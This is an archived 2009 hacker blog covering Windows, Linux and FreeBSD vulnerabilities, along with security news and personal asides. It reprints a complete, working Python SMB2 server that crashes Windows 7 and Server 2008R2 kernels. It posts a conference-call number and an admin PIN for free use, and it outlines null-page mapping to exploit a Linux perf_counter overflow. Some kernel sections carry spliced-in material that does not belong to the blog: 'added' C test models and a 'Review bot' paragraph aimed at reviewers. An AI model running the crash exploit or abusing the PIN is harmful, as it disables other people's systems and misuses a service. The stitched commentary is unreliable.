
Thursday, December 24, 2009

always carry your USB switchblade. it is getting rough out on the information alleys.

switchblade wiki

Friday, November 13, 2009

Windows 7 Kernel Crash bug , Microsoft "sudo" patent was bullshit , Blockhead's new album "The Music Scene"

HAPPY FRIDAY THE 13th! Just another excuse to cause digital ruckus. This lady is saying "Hmm, friday the 13th? I think i will BSOD someone's Win7 box..."

Before i get to the sudo thing, let me post some links...

This first one is a device that allows you to remotely play games on your console from your computer. pretty neat eh?
http://gizmodo.com/5359261/spawn-hd+720-is-like-a-slingbox-for-your-console-games

Next, i am sure you have all heard about the spreading iPhone worm that rick rolls you, and another worm deemed iPhone/Privacy.A, that allows an attacker to connect to a jailbroken iPhone which hasn't had its root password changed. Fun stuff. But check this out: the author of the Rick Astley worm has been getting DEATH THREATS and job offers from the whole thing.

And for some more luls, Britneys twitter account was hacked again.

+++++

Yesterday I recv() a link to gizmodo.com claiming that Microsoft had gotten a patent for the *nix sudo (super user do) command. Of course me and others shit ourselves instantly. To no surprise this claim was a bit off balance. First of all, here is a link to the patent, and now read this to understand a little better.

"Systems and/or methods are described that enable a user to elevate his or her rights. In one embodiment, these systems and/or methods present a user interface identifying an account having a right to permit a task in response to the task being prohibited based on a user's current account not having that right."

"At arrow 6, user interface 116 presents a GUI to the user having at least one account with rights sufficient to permit the prohibited task. The graphical use interface may comprise one, many, or all accounts having sufficient rights. In some cases all of the accounts may be so many as to be cumbersome. In these cases, the user interface and/or rights elevator may select which to present based on various criteria, such as frequency of use, those associated with the current user, those with sufficient but not unlimited rights, and the like."

Obviously the linux/unix sudo is in no way related to a GUI, so whatever. Thanks gizmodo for the false hype! How would you have felt if someone had been murdered over this? serious biz!

Windows 7 / Server 2008R2 Remote Kernel Crash


Laurent Gaffié posted on his blog PoC code and some great information on this flaw, so no reason to rewrite it. Just click the link above. Here is the PoC:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash

#Author: Laurent Gaffié
#

import SocketServer  # Python 2 module (socketserver in Python 3)

# Malformed SMB2 NEGOTIATE response sent back to whoever connects.
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
          "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
          "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
          "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
          "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
          "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
          "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
          "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
          "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):
        print "Who:", self.client_address
        print "THANKS SDL"
        data = self.request.recv(1024)  # read the client's negotiate request
        self.request.send(packet)       # answer with the malformed response
        self.request.close()


launch = SocketServer.TCPServer(('', 445), SMB2)  # listen all interfaces port 445
launch.serve_forever()


+++++

I have to give props to my man Blockhead for his new album "The Music Scene". Blockhead used to make beats for Aesop Rock. His instrumentals are great coding/h4xing fuel and will have your brain dancing with the stars... not the terrible celebrity kind, but the ones in space. here is a **** but please buy it if you like it. I have already pre-ordered the vinyl that will be released Jan 5 of next year.

Link to AMAZON to buy the CD!

Link to other Blockhead and Aesop Rock media for sale!

and the next installment of "KewL GuY oF ThE wEeK" (extras for friday 13th)

Wednesday, November 11, 2009

Google GO Programming Language.

http://golang.org/

At first glance you might think, "wow, just another C based object-oriented programming language" but you should know by now google always steps it up. The bottom line is GO is fast as shit.

"The native Go compilers, called 6g and 8g (for 64-bit and x86), are designed to be extremely fast. There is also an alternative compiler called Gccgo that is based on the GNU Compiler Collection (GCC). The GCC-based compiler isn't as fast but is said to generate more efficient code. I was initially a bit surprised that Google chose not to use the Low-Level Virtual Machine (LLVM) compiler framework—it has a lot of LLVM expertise internally and is using it extensively for their awesome Python optimization effort. Pike says that LLVM was considered during the early stages of the Go project, but its compile-time performance was judged to be inadequate."

here is the video promo for GO!

and a news article from arstechnica.

Being Open-Source we can expect this project to grow and be a part of the mainstream very soon. I highly doubt it will disappoint.

Tuesday, November 10, 2009

Software That patches itself + CBS 60 minutes on Cyber Warfare

Okay, i am getting input from IRC so i will start posting what people are saying about this. Keep brainstorming and contact me if you have anything to add.

"By observing a program's normal behavior and assigning a set of rules, ClearView detects certain types of errors, particularly those caused when an attacker injects malicious input into a program. When something goes wrong, ClearView detects the anomaly and identifies the rules that have been violated. It then comes up with several potential patches designed to force the software to follow the violated rules. (The patches are applied directly to the binary, bypassing the source code.) ClearView analyzes these possibilities to decide which are most likely to work, then installs the top candidates and tests their effectiveness. If additional rules are violated, or if a patch causes the system to crash, ClearView rejects it and tries another."

http://www.technologyreview.com/computing/23821/

thoughts from IRC:

<@rhythmx> there are tons of auto analysis tools/ideas already... they are mostly full of fail
<@rhythmx> and running that tool inline seems like a bad idea... because then you just increased the potential attack surface even more
<@rhythmx> you could maybe trick it into flagging all normal requests as evil ones and DoS all the services
+++
<@neonfreon> if your vendor sucks so bad you have to get a third party binary autopatcher you have problems
<@neonfreon> even if it's doable it's really stupid
<@neonfreon> it's a non deterministic crazy ass software modifier basically doing automated QA and bug fixes on a live, production system
<@neonfreon> that's fucking retarded
<@neonfreon> nobody wants that kind of thing in their enterprise
<@neonfreon> do that in QA labs
<@neonfreon> it has to also suffer from undecidability issues somehow
<@neonfreon> halting problem type issues
<@neonfreon> detect and fault and shutdown is all anyone wants and it's whats out there already
+++
<@jazz> as far as the self-patching thing, I think it's great for the situation they described wrt radiation potentially fucking bits
<@jazz> but if they try to apply it to commercial software I'm gonna laugh my ass off
+++
<@eliteandevil> wonder if you can make manipulate it so that it patches in a backdoor
<@eliteandevil> or makes it vuln to something
<@eliteandevil> making the unexploitable exploitable
<@jazz> I'm sure there'd be a way to poison the well
<@jazz> well remember that kernel bug a while back that only became an exploit due to compiler optimization?
<@jazz> I'm sure something similar would happen with this kinda technology


____________________________________________________________________


"Much of it was still theory, but we were told that before too long it might be possible for a hacker with a computer to disable critical infrastructure in a major city and disrupt essential services, to steal millions of dollars from banks all over the world, infiltrate defense systems, extort millions from public companies, and even sabotage our weapons systems."

this article goes on to talk about possibilities of power grids being shut down thru cyber warfare and other complete bullshit. I think they fail to realize we got along fine before the internet. Even if attackers could compromise such things as power grids, I am sure there are fail-safe methods to put them back up manually.

here's some shit daily dave thought was WTF, and i agree.

- "Some foreign power" was able to penetrate the Pentagon by leaving infected thumbnail drives where military personnel would find them, and use them. On the plus side, NOW thumbdrives are banned.
- In 2007, "Some unknown foreign power" penetrated the Department of Defense, Department of State, Department of Commerce, and they even think NASA, and stole terabytes worth of information. The method of attack wasn't disclosed as far as I remember.
- Some medical database owned by the state of Virginia was stolen, rm'd, encrypted, and ransomed. Sean Henry, who was describing it, didn't comment on whether or not the state actually paid the money, but his response seemed to imply that they did.

60 Minutes link. Cyber Warfare.

Daily Daves rant

Monday, November 9, 2009

Linux kernel Pipe Null Pointer Deref race condition + Offensive-Security.com hacked

Before we get to the fun stuff, giggle at this. Offensive Security's website was hacked through a vuln in their metasploit wiki. HEH. I'm not going to hate too much because i love backtrack with all my heart. The attackers uploaded an ejeet PHP shell around the 6th and it went unnoticed for 28 hours. This just goes to show you that no one is safe. Here is the blog post!
___
This was posted on the 3rd on Xorl, so sorry for the delay. I have to mention it because it is a really good vuln. It exists in fs/pipe.c and can be exploited similarly to the NULL pointer dereferences by spender. The routine in question is called when you open a pipe for writing, and it increments inode->i_pipe->writers to represent how many writers there are to the pipe. Here is that routine:

const struct file_operations write_pipefifo_fops = {
    ...
    .open = pipe_write_open,
    ...
};
...
static int
pipe_write_open(struct inode *inode, struct file *filp)
{
    mutex_lock(&inode->i_mutex);
    inode->i_pipe->writers++;
    mutex_unlock(&inode->i_mutex);

    return 0;
}

As it says on Xorl %eax, %eax, a NULL pointer dereference happens when a process opens a pipe at the same time another one releases it (if the release happens first): inode->i_pipe becomes NULL. Here are the 3 functions that release the pipe:

static int
pipe_read_release(struct inode *inode, struct file *filp)
{
    return pipe_release(inode, 1, 0);
}

static int
pipe_write_release(struct inode *inode, struct file *filp)
{
    return pipe_release(inode, 0, 1);
}

static int
pipe_rdwr_release(struct inode *inode, struct file *filp)
{
    int decr, decw;

    decr = (filp->f_mode & FMODE_READ) != 0;
    decw = (filp->f_mode & FMODE_WRITE) != 0;
    return pipe_release(inode, decr, decw);
}
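The ordering that matters is release finishing before open takes the mutex, and this added C model (mine, not the kernel's code; every name in it is hypothetical) runs that ordering directly instead of racing threads: a userspace pipe_release sets i_pipe to NULL once the last reader and writer are gone, and a hardened open then tests i_pipe under the same lock and returns -ENOENT where the unchecked routine above would dereference NULL.

```c
/* Added userspace model of the fs/pipe.c open/release ordering.
 * Hypothetical names; not kernel code. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

struct pipe_info { int readers; int writers; };

struct inode_model {
    int i_mutex_held;            /* toy stand-in for inode->i_mutex */
    struct pipe_info *i_pipe;    /* becomes NULL when the last user releases */
};

static void lock_inode(struct inode_model *inode)
{
    if (inode->i_mutex_held) abort();   /* the toy lock is not recursive */
    inode->i_mutex_held = 1;
}

static void unlock_inode(struct inode_model *inode) { inode->i_mutex_held = 0; }

/* Models pipe_release(): drop the counts, free the pipe when both reach zero. */
static int pipe_release_model(struct inode_model *inode, int decr, int decw)
{
    lock_inode(inode);
    struct pipe_info *pipe = inode->i_pipe;
    pipe->readers -= decr;
    pipe->writers -= decw;
    if (!pipe->readers && !pipe->writers) {
        free(pipe);
        inode->i_pipe = NULL;    /* the state an unchecked open then dereferences */
    }
    unlock_inode(inode);
    return 0;
}

/* Hardened pipe_write_open(): holding the mutex is not enough on its own, the
 * open path must also check i_pipe under that mutex before touching it. */
static int pipe_write_open_checked(struct inode_model *inode)
{
    int ret = -ENOENT;
    lock_inode(inode);
    if (inode->i_pipe) {
        inode->i_pipe->writers++;
        ret = 0;
    }
    unlock_inode(inode);
    return ret;
}

static struct inode_model *new_pipe_inode(int readers, int writers)
{
    struct inode_model *inode = calloc(1, sizeof *inode);
    inode->i_pipe = calloc(1, sizeof *inode->i_pipe);
    inode->i_pipe->readers = readers;
    inode->i_pipe->writers = writers;
    return inode;
}

/* Losing ordering: the last holder (an O_RDWR fd, like pipe_rdwr_release) goes
 * away first, then a writer opens. Returns what the checked open reports. */
static int open_after_last_release(void)
{
    struct inode_model *inode = new_pipe_inode(1, 1);
    pipe_release_model(inode, 1, 1);
    int ret = pipe_write_open_checked(inode);
    free(inode);
    return ret;
}

/* Normal ordering: a reader still holds the pipe, so the writer open succeeds
 * and the writer count goes to 1. */
static int writers_after_open_on_live_pipe(void)
{
    struct inode_model *inode = new_pipe_inode(1, 0);
    if (pipe_write_open_checked(inode) != 0) return -1;
    int writers = inode->i_pipe->writers;
    pipe_release_model(inode, 1, 1);   /* last reader and our writer go away */
    free(inode);
    return writers;
}

int main(void)
{
    printf("open after last release -> %d (ENOENT is %d)\n",
           open_after_last_release(), -ENOENT);
    printf("writers after open on live pipe -> %d\n",
           writers_after_open_on_live_pipe());
    return 0;
}
```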

and while we are ripping information from xorl, i guess I'll post this heap overflow in Poppler PDF reader that has relatively little importance. Still a good article.

Saturday, November 7, 2009

What is this?

Friday, November 6, 2009

SSLV3 MiTM & str0ke funeral coverage.



I am sure a lot of you have heard about these techniques, but here are 2 good links on the subject. New links added as well.

http://www.g-sec.lu/Renegotiating%20TLS.pdf

https://www.ihteam.net/blog/hacking-tutorial/tls-sslv3-man-in-the-middle-attack/
/* i am fixing the code right now, I'll post the revision soon */ here it is. by knife

RIP str0ke!!!

http://www.h-i-r.net/2009/11/schrodingers-hacker.html

okay, now THIS is a bit frightening.

"In Utah, the National Security Agency is building a $2 billion storage facility that will house and analyze all forms of electronic communication...a potential yottabyte of everyone's (formerly) personal data."

btw that is 15 zeros and here is the link from gizmodo

Thursday, October 29, 2009

Hapy BDAY interwebz!@#$ Free Conf, SecureTwitter, and Blackberry eavesdropping fun++

The phone number i am about to post is from "freeconferencecallnetwork.com". We used to go to the site and set up a free conf, which in turn would give us a number and a PIN#. After using it a few times we realized that *every* PIN works *all* the time and they each lead to a different room. The 66666 is just the one we use. * after the pin gives you admin rights and # is normal.

7124321402 66666* <-- your halloween gift! dont wear it out.


ubuntu 9.10 was released a couple of days back and here is the link(ubuntu download page).

to all my anti-ubuntu homies, dont h8, flatulate!

I am skeptical of large anti-virus/malware companies, but Kaspersky and Finjan have released some nifty tools to fight malicious links on social networking sites.

"The company is scanning nearly 500,000 new unique URLs that appear in Twitter posts daily, he said. Of those, anywhere between 100 and 1,000 are malware attacks. Twitter has also been targeted by the Koobface virus which posts malicious links from infected users' accounts."

^ a respectable endeavor in my honest opinion, so check out the article at least.

and even better here is a link at CNET for the free finjan browser plugin dubbed SecureTwitter!

_____

I saw an article about a month ago about blackberrys being prone to attacks through freely available software that is laced with trojans/malware. Not a big surprise, but this next bit of news is quite amusing.

"BLACKBERRY USERS are being warned that a freely available spyware program will turn their crackberry into a listening device.

The application is called Phonesnoop and allows remote users to listen in on a Blackberry user's surroundings. The spyware app uses standard Blackberry APIs to intercept incoming calls. Once the software is installed, a call from a trigger phone number will activate the listening feature through the phone's built-in speakerphone feature to listen to everything that's going on around the phone."

link to article

and last but not least HAPPY BIRTHDAY INTERNETZ!@#$%

On Oct. 29, 1969, First Message Sent Between Two Locations

Friday, October 23, 2009

21,000 vuln embedded devices found in scan of internet


Primarily consisting of LinkSys routers (RLY?), a study posted today showed that over 21,000 embedded devices including webcams, VOiP products, and routers are vulnerable to remote attack. The main reason being that they have admin interfaces publicly facing the net. Not much to say here, other than i am not surprised. Interesting article nonetheless. The image of vuln linksys routers made me giggle up my root beer.

http://www.megaplatinum.net/v5/html/ftopict-126009.html
http://www.wired.com/threatlevel/2009/10/vulnerable-devices/

Arduino over Web & My new twitter


http://ultimate-hacker.blogspot.com/2009/09/blinking-led-over-web-with-python.html

This article has the code and howto available on how to make an LED blink over the net with the arduino atmega board. Although this may seem to be useless, it is a great starting point on using the board for anything over the internet using Python, Apache, and PHP.

After years of twitter being the new "cool thing" I have finally made an account. It is located here, though i doubt i will ever post much. In fact i make fun of tweets all the time. The main reason i want to get familiar with twitter is to use it in non-traditional ways. Our great friend c4thy from immoral.iniquity.net had an excellent idea that i will not post at the moment. It got me to brainstorming, and you guys will be seeing something come out of it in the near future.



Thursday, October 8, 2009

frasunek is bitchmade.

"Hi! My name is Przemyslaw! I hope everyone enjoys my codez. I promise i tried to release them sooner but the FreeBSD security team ignored my frantic emails. I didn't want them to fall in the hands of some hacker before all my dumb admin buddies had a chance to patch"
More than a month after he posted videos of himself using the kqueue() related pipe (fbsd 6.4) and devfs(fbsd <7.2) the whitefag releases his exploits to the pub.

http://www.frasunek.com/pipe.txt

"FreeBSD 6.4 and below are vulnerable to race condition between pipeclose() and knlist_cleardel() resulting in NULL pointer dereference. The following code exploits vulnerability to run code in kernel mode, giving root shell and escaping from jail.

http://www.frasunek.com/devfs.txt

FreeBSD 7.2 and below (including 6.4) are vulnerable to race condition in VFS and devfs code, resulting in NULL pointer dereference. In contrast to pipe race condition, this vulnerability is actually much harder to exploit."

____


In other News:

Milw0rm.com seems to be dead, here is a mirror of the archives.

Wednesday, October 7, 2009

National CyberCrime Awareness Month - IBM AIX rpc.cmsd buffer overflow vuln

it is October, and you know what that means. hack or treat! It is the National Cybercrime Awareness month and someone already posted over 30,000 gmail, windows live, yahoo and other account usernames/passwords <--the list...(BBC article) (dailymail article) but how did this attacker acquire these?.. and why would they post them to the pub? Most likely a phishing scam, but you never know, it could have something to do with a second party spacker (spammer/hacker) owning a large botnet. Anyways check your crap and do not use 123456 or other retarded simple shit as your passwd. People are spooked and here is a crappy article about fighting phishers.

Today, google used a barcode as their daily image. after very little research i found that it is the 57th anniversary of the patent on the "barcode". here is a site that shows you how to make your own like google. with a lot of info on the concept.

IBM AIX stack buffer overflow vuln in rpc.cmsd (calendar service) - security focus bid

Patch for AIX 6.1, Patch for AIX 5.3

You might remember a buffer overflow in this service back in 1999 that was widely exploited. ahhh memories!


and now for our COOL GUYS OF THE WEEK! the one on the left looks like Nicholas Cage!

Wednesday, September 23, 2009

Reverse Debugging in GDB 7.0

<@knife> reverse debugging?
<@knife> does that mean it puts bugs back into the program?
<@knife> :P

The new GDB version 7.0 is supposed to be released this month and will finally have reversible debugging features. It will be supported on native i386 Linux and AMD64 along with several remote targets. GDB is every hacker's favorite debugger and I am sure you will all be excited about these new commands.

  • reverse-continue ('rc') -- Continue program being debugged but run it in reverse
  • reverse-finish -- Execute backward until just before the selected stack frame is called
  • reverse-next ('rn') -- Step program backward, proceeding through subroutine calls.
  • reverse-nexti ('rni') -- Step backward one instruction, but proceed through called subroutines.
  • reverse-step ('rs') -- Step program backward until it reaches the beginning of a previous source line
  • reverse-stepi -- Step backward exactly one instruction
  • set exec-direction (forward/reverse) -- Set direction of execution.
    All subsequent execution commands (continue, step, until etc.) will run the program being debugged in the selected direction.

Breakpoints and watchpoints will work in reverse -- allowing you for instance to proceed directly to the previous point at which a variable was modified.

http://www.gnu.org/software/gdb/news/reversible.html

http://sourceware.org/gdb/wiki/ReversibleDebugging


Tuesday, September 22, 2009

BotNet infected IP Ranges, BSOD fun, and the worst Star Wars costumes of all time!

Since there is nothing terribly important to post about at the moment, I will take this time to have a little fun. First of all, I am going to post a couple of funny BSOD images i found recently. ENJOI!


Next is an IP list to shift focus towards. It is a list of ranges that are repeat botnet infected servers/PCs. Some of the ranges are even /16 so it might be a lot to go through, but who knows what some research might bring. Like the forum post said...

"It doesn't take an Einstein to figure out that this IP list is like a shopping list of 'soft targets'... ie ISP's that are obviously vulnerable to being oWn3d. Heck.. they are already owN3d... or they wouldn't have shown up in this list." -courtesy of http://www.infosyssec.com/forum

third: Is this not the lamest Full Disclosure post ever?!?! I have seen some bad ones in my day, but this takes the cake.

[FD] Re: Dumb question: Is Windows box behind a router safe ? [ http://seclists.org/fulldisclosure/2009/Sep/0320.html ]

and last but not least, the worst(or best?) star wars costumes of all time. HEH!

Monday, September 21, 2009

Gay Test


if you are trying to read what that code in the background is, you might be...

Friday, September 18, 2009

Linux Kernel perf_counter_open() Buffer Overflow Vulnerability



This issue has been reported to affect Linux kernel 2.6.31-rc1 up to (and including) 2.6.31. Credits go to Xiao Guangrong for discovering this. This bug can be found in /usr/src/linux/kernel/perf_counter.c, specifically in the perf_copy_attr routine.

...

4126 static int perf_copy_attr(struct perf_counter_attr __user *uattr,
4127 struct perf_counter_attr *attr)
4128 {
4129 int ret;
4130 u32 size;

...
4135 /*
4136 * zero the full structure, so that a short copy will be nice.
4137 */
4138 memset(attr, 0, sizeof(*attr));
4139
4140 ret = get_user(size, &uattr->size);
4141 if (ret)
4142 return ret;
4143
4144 if (size > PAGE_SIZE) /* silly large */
4145 goto err_size;
4146
4147 if (!size) /* abi compat */
4148 size = PERF_ATTR_SIZE_VER0;
4149
4150 if (size < PERF_ATTR_SIZE_VER0)
4151 goto err_size;

Okay, as you can see on line 4130, size is declared to be a 32 bit unsigned integer. On line 4138, the first call to get_user is made, and acts as a wrapper to __get_user_check.

The get_user macro provides the main single-value transfer routines, which automatically use the right sizes if and only if we have the right pointer type. In the case shown above, uattr->size (the userland event type attribute size) is read straight from userland into our unsigned 32 bit kernel-land size variable; the macro supports simple types such as char/int, but not larger data types like arrays and structures.

PAGE_SIZE is defined in /usr/include/asm-generic/page.h as (1 << PAGE_SHIFT), where PAGE_SHIFT is defined to be 12, resulting in 4096. So the bug here is that we have to specify a size, it only has to be <= 4096, and thus we can pass any number of bytes <= PAGE_SIZE, which will be copied into a buffer of that size. This bug can be exploited by mmap'ing the null page and overwriting the stored ret with 0x0's, or by triggering it as a race condition so we can copy arbitrary data from "copy_to_user".

4157 if (size > sizeof(*attr)) {
4158 unsigned long val;
4159 unsigned long __user *addr;
4160 unsigned long __user *end;
4161
4162 addr = PTR_ALIGN((void __user *)uattr + sizeof(*attr),
4163 sizeof(unsigned long));
4164 end = PTR_ALIGN((void __user *)uattr + size,
4165 sizeof(unsigned long));
4166
4167 for (; addr < end; addr += sizeof(unsigned long)) {
4168 ret = get_user(val, addr); // <<< Here.
4169 if (ret)
4170 return ret;
4171 if (val)
4172 goto err_size;
4173 }
4174 }

So now we can simply copy the bytes from userland into kernel-land with our own content:

4175
4176 ret = copy_from_user(attr, uattr, size);

As you can probably already see, mmap'ing address 0x0, as many exploit developers have done in recent times, like so, should be enough for a barebones exploit:

/* Courtesy of Bradley Spengler */

(struct perf_counter_attr *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

when calling the sys_perf_counter_open syscall with these arguments. So, as you can see, the bug is a pretty routine buffer overflow. Exploit developers should know their way around from here, and I must applaud Xiao for finding this; you have a pretty keen eye ;)

And here's how the patch for this bug was implemented:

...
__user *uattr,
if (val)
goto err_size;
}

+ size = sizeof(*attr);
}

ret = copy_from_user(attr, uattr, size);
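Review bot: the added `size = sizeof(*attr);` has to stay where it is, inside the `if (size > sizeof(*attr))` branch and after the `if (val) goto err_size;` loop, not before it: the loop must still walk the caller's full `size` to reject any non-zero tail, and only once that has passed may the copy length be clamped so that `ret = copy_from_user(attr, uattr, size);` can no longer write past `*attr`. Placing the clamp unconditionally would also be wrong, since a `size` smaller than `sizeof(*attr)` is the ABI-compat short copy the earlier `memset(attr, 0, sizeof(*attr))` exists for. The fragment shown has lost its hunk header and leading context (`__user *uattr,` is all that survives), so a reader cannot see the enclosing function from the patch alone.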

....
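To make the size handling concrete, here is an added userspace C model (mine, not the kernel's code; names are hypothetical) of perf_copy_attr() with a canary placed right after the destination attr. The same function runs with and without the patch's `size = sizeof(*attr)` clamp, so the zero bytes landing past the struct that the text describes can be observed rather than argued about; the model struct is 24 bytes instead of the kernel's 64, and get_user/copy_from_user are stood in for by memcpy bounded by the caller's buffer.

```c
/* Added userspace model of perf_copy_attr()'s size handling. Hypothetical
 * names, cut-down struct; this is not the kernel's code. */
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MODEL_PAGE_SIZE 4096

/* Cut-down attr: as in the kernel, the u32 size field sits at offset 4. */
struct attr_model {
    uint32_t type;
    uint32_t size;             /* caller-supplied structure size (ABI versioning) */
    uint64_t config;
    uint64_t sample_period;
};
#define ATTR_SIZE_VER0 ((uint32_t)sizeof(struct attr_model))  /* model has one ABI version */

/* Kernel-side destination with a canary directly after attr, standing in for
 * whatever follows the buffer in the real frame (the text's "stored ret"). */
struct guarded_attr {
    struct attr_model attr;
    unsigned char canary[16];
};

/* ubuf/ubuf_len stand in for the user pointer and how much of it is mapped.
 * `patched` toggles the one-line fix. Returns 0 or a negative errno. */
static int perf_copy_attr_model(const unsigned char *ubuf, size_t ubuf_len,
                                struct guarded_attr *dst, int patched)
{
    uint32_t size;

    memset(&dst->attr, 0, sizeof dst->attr);      /* a short copy leaves zeros */

    if (ubuf_len < offsetof(struct attr_model, size) + sizeof size)
        return -EFAULT;
    memcpy(&size, ubuf + offsetof(struct attr_model, size), sizeof size);

    if (size > MODEL_PAGE_SIZE)                   /* silly large */
        return -E2BIG;
    if (!size)                                    /* abi compat */
        size = ATTR_SIZE_VER0;
    if (size < ATTR_SIZE_VER0)
        return -E2BIG;
    if (size > ubuf_len)                          /* user memory ends first */
        return -EFAULT;
    if (size > sizeof *dst)                       /* model-only guard: keep the demo in bounds */
        return -E2BIG;

    if (size > sizeof dst->attr) {
        /* Newer userland on an older kernel: the extra tail must be all zero. */
        for (size_t i = sizeof dst->attr; i < size; i++)
            if (ubuf[i])
                return -E2BIG;
        if (patched)
            size = sizeof dst->attr;              /* the one-line fix */
    }

    /* Unpatched, `size` may still exceed sizeof(attr) here, so the zero tail is
     * copied straight past the struct: the overflow the text describes. */
    memcpy((unsigned char *)dst, ubuf, size);
    return 0;
}

/* Constructed input: the size field claims `claimed` bytes, all else zero, with
 * 8 bytes of "newer ABI" tail. Reports the model's rc and whether the canary
 * after attr survived (1) or was partly zeroed by the copy (0). */
static int run_model(uint32_t claimed, int patched, int *intact)
{
    unsigned char ubuf[sizeof(struct attr_model) + 8];
    struct guarded_attr dst;
    int rc;

    memset(ubuf, 0, sizeof ubuf);
    memcpy(ubuf + offsetof(struct attr_model, size), &claimed, sizeof claimed);
    memset(dst.canary, 0xAA, sizeof dst.canary);

    rc = perf_copy_attr_model(ubuf, sizeof ubuf, &dst, patched);
    *intact = 1;
    for (size_t i = 0; i < sizeof dst.canary; i++)
        if (dst.canary[i] != 0xAA)
            *intact = 0;
    return rc;
}

static int copy_rc(uint32_t claimed, int patched)
{
    int intact;
    return run_model(claimed, patched, &intact);
}

static int canary_intact(uint32_t claimed, int patched)
{
    int intact;
    run_model(claimed, patched, &intact);
    return intact;
}

int main(void)
{
    uint32_t oversized = sizeof(struct attr_model) + 8;
    printf("unpatched size=%u: rc=%d canary intact=%d\n", oversized,
           copy_rc(oversized, 0), canary_intact(oversized, 0));
    printf("patched   size=%u: rc=%d canary intact=%d\n", oversized,
           copy_rc(oversized, 1), canary_intact(oversized, 1));
    printf("size=%d: rc=%d (E2BIG is %d)\n", MODEL_PAGE_SIZE + 1,
           copy_rc(MODEL_PAGE_SIZE + 1, 0), -E2BIG);
    return 0;
}
```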

The race condition can be exploited too, in order to achieve essentially the same results. You could probably read more into exploiting kernel based race conditions, and how to force a kernel path to sleep, in the very well written article written by sgrakkyu and twiz in phrack 64.

Thanks go to bob the builder, redsand and nemo for discussing this and reviewing this for me (apparently, I can't speak english very well)

~hqi ( hqi <> efnet pe )

ARM announces 2Ghz processor

ARM Architecture has become a dominating force in the world of embedded electronics and most notably, high-end cellular phone products. While Microsoft has chosen not to support the architecture in its Windows 7, the majority of all the devices using this badass new chip will be Linux based. The new 2Ghz Cortex-A9 microprocessor should be shipped by the end of 2009, allowing for devices to be released by next year.

http://www.arm.com/

at least your new touchphone wont ever do this.

Thursday, September 17, 2009

smb2 vista/7 remote code execution

Security Focus Page with some PoC code.

Daily Dave links to an immunityinc.com page that is only allowing customers to download the working remote and local remote execution exploits for smb2 vuln.

Here is the download site, but a username and passwd is needed to access.
and
Here is the Daily Dave thread.

also these french guys obviously have some good code for it as well. google translate used to convert their blog to english.

check them out!

Wednesday, September 16, 2009

perf_counter_open() local buffer overflow vuln

Linux Kernel 2.6.31-rc1 thru 2.6.31 == vuln;

edited:check out the excellent article written by our own HQI

Crappy boundary checks on user data result in an attacker being able to execute arbitrary code. The security focus advisory says this is not confirmed, but this youtube video shows spender running an exploit named "powerglove" and getting dropped a rootshell. It is in his enlightenment framework here, all knitted up nice with these:

[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] Powerglove: Linux 2.6.31 perf_counter local root
[2] The Rebel: Linux < 2.6.19 udp_sendmsg() local root
[3] Wunderbar Emporium: Linux 2.X sendpage() local root

spender after he wrote the 1st sock_sendpage sploit.

Monday, September 14, 2009

OpenSSL vuln

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

Dan Kaminsky discovered OpenSSL would still accept certificates with MD2 hash signatures. As a result, an attacker could potentially create a malicious trusted certificate to impersonate another site. This update handles this issue by completely disabling MD2 for certificate validation.

bugtraq link

Sunday, September 13, 2009

Another kqueue() local root vuln w/video

The other kqueue() vuln affecting FreeBSD 6.x - 6.4 STABLE should be disclosed soon now. The FreeBSD security team was notified as early as August 29th, but i guess Frasunek just got a response. Przemyslaw Frasunek's blog posted a video of successful exploitation leading to local root, but details will not be released until an official advisory is released. Stay tuned.

Saturday, September 12, 2009

SMB2 BSOD Proof of Concept C source/JewBacca



i just converted the Python bluescreen Proof of Concept code to C. It was posted to full disclosure a few days ago and has been tested on many service packs/versions of windows.

no biggie smalls.. i havent tested it really, but here is first draft...

smb2-bsod.c pastebin

and still adding on to the "FINAL sock_sendpage() NULL pointer dereference" post
FINAL sendpage() exploit???

ReDoS?

I can't say i am a fan of the coined term "reDoS" but the PDF from http://www.checkmarx.com is damn good.

By "ReDoS" they are referring to "regular expression denial of service". these common bugs have been around for quite a while, but this presentation explores some new ways to exploit it and is worth a read.

Presentation PDF Direct Link.

Friday, September 11, 2009

Apache Zombies on weak ass BotNet

A ton of VPS/dedicated linux servers running Apache have been found to be zombies in a botnet serving malware with a proxy webserver package known as nginx. a few weeks ago, someone found a few twitter accounts being used to control botnets, and just today symantec posted about Google groups being used to do the same with a trojan being called Trojan.Grups.

"The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver."

^ from the register article

Windows Vista/7 SMB2 Negotiate Protocol Request remote BSOD P.O.C

#!/usr/bin/python
